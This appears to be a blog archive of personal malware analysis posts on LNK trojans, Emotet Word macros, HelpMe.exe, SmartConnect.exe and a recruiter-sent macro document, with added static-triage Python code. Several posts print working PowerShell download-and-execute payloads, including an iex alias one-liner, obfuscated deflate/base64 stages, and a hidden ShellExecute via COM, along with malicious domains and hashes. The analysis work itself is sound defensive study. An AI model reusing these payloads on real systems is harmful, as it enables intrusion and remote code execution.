Category Archives: Malware Analysis

Trojan malware – Microsoft Shortcut (LNK)

I downloaded this sample for malware analysis and changed its extension to .LNK, which is the Microsoft Shortcut format.

Right-clicking the file and opening the Shortcut tab showed that the target is an embedded PowerShell command.


Below is the PowerShell command line, which downloads another PowerShell script from the URL and executes it.

The URL is http[:]//timebounder[.]ru and it downloads the PowerShell script pps[.]ps1.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal calc $je;$mM=((New-Object Net.WebClient)).DownloadString('http[:]//timebounder[.]ru/ pps.ps1');calc $mM


I tried running the script, but the website (http[:]//timebounder[.]ru) is down, so the second PowerShell script could not be downloaded.
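As an added example (not from the original post), the layers of the one-liner above can be unwrapped statically in Python instead of running it: the Base64 literal, the sal alias, the download call and the hidden-window switch. The regular expressions are assumptions tuned to this shape of command line, and the URL stays defanged as the post writes it.

```python
import base64
import re

# Constructed sample: the LNK target command line quoted in this post, with the
# URL kept defanged exactly as the post writes it (it is not a live address).
SAMPLE_CMDLINE = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 "
    "$je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));"
    "sal calc $je;"
    "$mM=((New-Object Net.WebClient)).DownloadString('http[:]//timebounder[.]ru/ pps.ps1');"
    "calc $mM"
)

# $var = ... FromBase64String('...') ...  -> bind the decoded text to $var
B64_ASSIGN = re.compile(r"(\$\w+)\s*=[^;]*?FromBase64String\('([A-Za-z0-9+/=]+)'\)", re.I)
# sal / Set-Alias <name> <$var>           -> <name> now means whatever $var holds
ALIAS = re.compile(r"\b(?:sal|Set-Alias)\s+(\S+)\s+(\$\w+)", re.I)
# quoted argument of DownloadString / DownloadFile / DownloadData
DOWNLOAD = re.compile(r"Download\w+\('([^']+)'", re.I)
# -WindowStyle (any prefix, e.g. -windo) followed by 1 or Hidden
HIDDEN = re.compile(r"-w\w*\s+(?:1|hidden)\b", re.I)

def triage(cmdline: str) -> dict:
    """Statically unwrap the one-liner: decode base64 literals, resolve aliases, pull URLs."""
    decoded = {var: base64.b64decode(b64).decode("utf-8", "replace")
               for var, b64 in B64_ASSIGN.findall(cmdline)}
    aliases = {name: decoded.get(var, var) for name, var in ALIAS.findall(cmdline)}
    urls = DOWNLOAD.findall(cmdline)
    # an alias for iex / Invoke-Expression applied to a variable is the tell:
    # the downloaded string is executed in memory, never written to disk
    iex_aliases = [n for n, t in aliases.items() if t.lower() in ("iex", "invoke-expression")]
    runs_download = bool(urls) and any(
        re.search(r"\b" + re.escape(a) + r"\s+\$\w+", cmdline) for a in iex_aliases)
    return {"decoded": decoded, "aliases": aliases, "urls": urls,
            "hidden_window": bool(HIDDEN.search(cmdline)),
            "download_and_execute": runs_download}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```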

VirusTotal –

SHA256 – 4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98


Microsoft Shortcut (LNK) trojan malware

I downloaded this malicious Microsoft Shortcut sample from VirusTotal for analysis.

After downloading, I renamed it sample.lnk (.LNK is the Microsoft Shortcut extension).

When I opened the Properties tab of this file, I found the properties below, which clearly show it is not a shortcut to any application but a PowerShell script that executes on opening.

  • Target Type: Application
  • Target: PowerShell script
  • Description: Windows PowerShell




I copied and pasted the PowerShell script into a text file.


Behavior of PowerShell script:

  • Downloads another PowerShell script, out-763347625.ps1, from the URL https[:]//latinotca-ar[.]com

I double-clicked it to check the behavior; a command prompt window opened and closed.

I could see that the PowerShell script executed and tried to connect to the URL; Wireshark captured the network traffic.




The website has been taken down. I tried to open the URL in a browser and it is inaccessible.

VirusTotal sample:

SHA-256: 5c5c2c6197d4b1c24c438b8fb0452257c9e4085ac59297a985ec92ef1720b74d
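For both LNK posts, an added example that is not the author's code: a minimal parser for the Shell Link binary format that reads the target's relative path and command-line arguments straight from the .lnk bytes, so the file never has to be opened in Explorer or double-clicked. It skips the LinkTargetIDList and LinkInfo sections (assumed not needed here, so a target stored only in the ID list is not reported), and build_sample_lnk fabricates a test shortcut modelled on the post's sample.

```python
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# LinkFlags bits from MS-SHLLINK; the optional sections appear in this order
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40)]

def parse_lnk(data: bytes) -> dict:
    """Read the header, skip the ID list / LinkInfo, and decode the STRING_DATA fields."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("missing ShellLinkHeader")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("LinkCLSID is not the shell link CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_ID_LIST:                 # LinkTargetIDList: uint16 IDListSize, then items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:               # LinkInfo: uint32 LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for field, bit in STRING_FIELDS:        # uint16 CountCharacters, then the characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                info[field] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                info[field] = data[pos:pos + count].decode("cp1252")
                pos += count
    return info

def is_script_host_lnk(info: dict) -> bool:
    """Flag a shortcut whose target is PowerShell with a command line, as in both posts."""
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    return "powershell" in target and bool(info.get("arguments"))

def build_sample_lnk(target: str, args: str) -> bytes:
    """Constructed minimal .lnk: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS, Unicode."""
    flags = 0x08 | 0x20 | IS_UNICODE
    hdr = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack("<I", flags)
    hdr += b"\0" * (60 - len(hdr)) + struct.pack("<I", 7) + b"\0" * 12  # ShowCommand 7 = SW_SHOWMINNOACTIVE
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (target, args))
    return hdr + body

if __name__ == "__main__":   # constructed shortcut modelled on the post's sample
    sample = build_sample_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                              "-Exec bypass -windo 1 sal calc iex;calc $mM")
    print(parse_lnk(sample), is_script_host_lnk(parse_lnk(sample)))
```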


Emotet malware analysis

VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c

File Type: Microsoft Word Document

Document Property:

I used oletools to analyse the Word document's properties and content.



This Word document has VBA macros.

Parsing the document with olevba reports that the file contains suspicious hex strings and Base64 strings.

The file has the macro modules below:

  • LUDoB_BX.cls
  • fkkkCAk.bas
  • ZAAcAA.bas

and the macros auto-execute when the document is opened.


I started debugging the macros in Word:


After Enable Editing, open View Macros under the View tab.



Click Edit and rename the autoopen() function to autoopen2(), so it no longer fires automatically while you step through it.


There are many small chunks of Base64 strings that are concatenated to build a PowerShell script. I captured the Base64 string in a text file and tried to decode it. I did not get the complete Base64, only part of it, but it can be recognized as a PowerShell script.


(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING(('ZZJh'+'i'+'5'+'tAEIb/y'+'n'+'4'+'QNiFVz9YP5US4MbYSS'+'gOmhLN'+'H'+'QXQz'+'6kbd9XSjOUL'+'+e'+'zdtJbSdb7s87z'+'vDO2'+'O8g'+'q5'+'z4P'+'r0E'+'EA'+'an8'+'OI'+'esbXKA5TGfoCJ1PmR2SK'+'bFFZz5ivG45'+'CecZrKJMA'+'wKeV'+'Ut2jbW'+'M'+'7
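An added example (not from the post) reconstructing the obfuscation seen above: the macro emits the second stage as raw-DEFLATE bytes, Base64-encoded and chopped into short quoted pieces joined with +. build_obfuscated fabricates such a string from a constructed stage-two script (the post's real payload was only partly recovered, so it is not reused), and recover reverses it statically by joining the pieces, decoding and inflating.

```python
import base64
import re
import zlib

def build_obfuscated(script: str, chunk: int = 3) -> str:
    """Constructed stand-in for what the macro assembles: raw-deflate the script,
    base64 it, and split the base64 into short quoted pieces joined with '+'."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)      # -15: raw DEFLATE, like .NET DeflateStream
    data = comp.compress(script.encode("utf-8")) + comp.flush()
    b64 = base64.b64encode(data).decode("ascii")
    pieces = "+".join(f"'{b64[i:i + chunk]}'" for i in range(0, len(b64), chunk))
    # same shape as the snippet in the post (the mixed case is cosmetic to PowerShell)
    return ("(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] "
            f"[coNverT]::FrOMbase64stRING(({pieces})), "
            "[iO.cOmPreSsIOn.coMpresSiOnMoDe]::dEcoMpRess))")

QUOTED = re.compile(r"'([^']*)'")

def recover(obfuscated: str) -> str:
    """Undo the obfuscation without running it: join the quoted pieces, base64-decode, inflate."""
    text = obfuscated.replace("\u2018", "'").replace("\u2019", "'")   # curly quotes from a web page
    b64 = "".join(QUOTED.findall(text))
    blob = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return zlib.decompress(blob, -15).decode("utf-8", "replace")

if __name__ == "__main__":
    # constructed second stage; the URL is a placeholder, not the post's real one
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http[:]//example[.]invalid/RRKu/')"
    wrapped = build_obfuscated(stage2)
    print(wrapped[:120], "...")
    print(recover(wrapped))
```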

During debugging, I saw the values below stored in the variable YAAAAAA; it is reading registry key values.




While debugging, I captured traffic with Wireshark and found that a connection was made to the website emseenerji[.]com at IP 94[.]73[.]147[.]237. The URL is still alive and can be accessed.



The complete URL accessed by this program is http[:]//emseenerji[.]com/wp-content/RRKu/

My host machine's AV blocked this URL, so I couldn't analyze the traffic from it to my VM any further.

Thank you.

HelpMe.exe malware


SHA256 – 9ff1c8e6d80ebf5626714362cbc55a53ba17038e841773d24fdc018891adb52e

Tools used for analysis: OllyDbg, Wireshark, PE Explorer.

I started debugging with OllyDbg. The first warning I received was:

"Module 'AutoRUN_' has entry point outside the code (as specified in the PE header). Maybe this file is self-extracting or self-modifying. Please keep it in mind when setting breakpoints!"


The executable extracts a HelpMe.exe file and copies it to C:\Windows\System32.



It also extracts an AUTORUN_INF.exe file to C:\ and creates an AUTORUN.ini file at the same location.



AutoRun.exe executes HelpMe.exe.

It also adds HelpMe.exe to the Startup programs and renames the shortcut icon to Soft.

soft ink


The behavior I observed is that this malware replicates itself and creates/hides Word, PDF, XLS and Pages document files under the Recycle Bin folder.


I also observed that HelpMe.exe keeps changing location between C:\Windows\System32 and C:\Windows\SysWOW64.

I stopped my analysis here after spending 2 days, as this malware does a lot of things in the background.


SmartConnect.exe Malware


SHA-256 — 7c3e2a38dcacc3246409151ecdf283814611a8f9d98ed0e5996fb2615adc2cc2

I requested the malware sample from MalShare for analysis and renamed the file with a .exe extension.

Tools I used: OllyDbg, Wireshark, PE Explorer.

I opened the downloaded sample in PE Explorer and found the resource information.


Before I started debugging, I extracted the malware executable with 7-Zip. It contained two VPN applications: Kerio VPN (KVPN) and OpenVPN.


Opening the settings.ini file from the list above, the license owner information was given as www[.]WebTune[.]ir


I started debugging the malware executable in OllyDbg. It shows the behavior of the application; see the image below.

exe files

The malware program got installed at the location

C:\Program Files (x86)\P3Filter v2.3714840114\SmartConnection.exe

It also added a shortcut file to the Start menu programs.


It also installed a Kerio VPN switch adapter on my virtual machine.


Wireshark packets showed the application trying to connect to the URL below, with DNS resolving to the domain mycn[.]ir

domain — mycn[.]ir



Please post your suggestions to improve my analysis.


Is openssh.ps1 Malware?

Recently I downloaded a Windows 10 VM from Microsoft's site. Today, in the C:\ drive, I saw a folder named BGinfo which I know I had not created.

After opening it I saw two files:


In the openssh.ps1 file I found a URL:


After accessing the URL, an SSH setup executable downloads. Searching the URL on VirusTotal shows that 2 out of 62 AVs detected it as malware.

During the investigation I found a BGinfo program added to the Startup programs (I disabled it later).


SSH was also installed on the server, with services running from Task Scheduler.

I ran Procmon and Netmon to analyze the behavior. I did not find any unusual activity, calls or traffic to or from a remote server, nor any process or executable running in the background.

During the analysis I did not run this PowerShell script.

VirusTotal –  [Link here]

Microsoft word document malware analysis

I had emailed a recruiter last year about a job opportunity. He replied a year later with an attachment; it was encrypted and the password was provided.


I unzipped it and looked at the properties of the Word document.


I analysed the file using oletools and the result showed it as a suspicious file.


I found the value "1jwe7d7n1544" in the macro code (highlighted in yellow).


After debugging the macro in Word, I got a Base64 string (below the screenshot).



Converting the Base64 string resulted in the PowerShell code below.

# WebClient is created and DownloadData is located by reflection, so the method
# name never appears as a direct call in the script text
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq "DownloadData"){
$uri = New-Object System.Uri("http://")   # URL elided in the original post
$response = $m.Invoke($instance, ($uri));
# payload written to C:\ProgramData (CommonApplicationData) as BrMtj.exe
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\BrMtj.exe";
[System.IO.File]::WriteAllBytes($path, $response);
# COM object created by CLSID (ShellBrowserWindow) instead of a ProgID; its
# Document.Application exposes ShellExecute, and the final 0 runs the file hidden
$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}
}

Behavior of the macro —

  • Executes when the Word document opens.

Behavior of the PowerShell script —

  • The PowerShell script accesses the URL (http://
  • It downloads the executable file BrMtj.exe

Note: When I tried to access the URL in a browser, it was inaccessible.

Malware sample on VirusTotal —

SHA256 — e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720

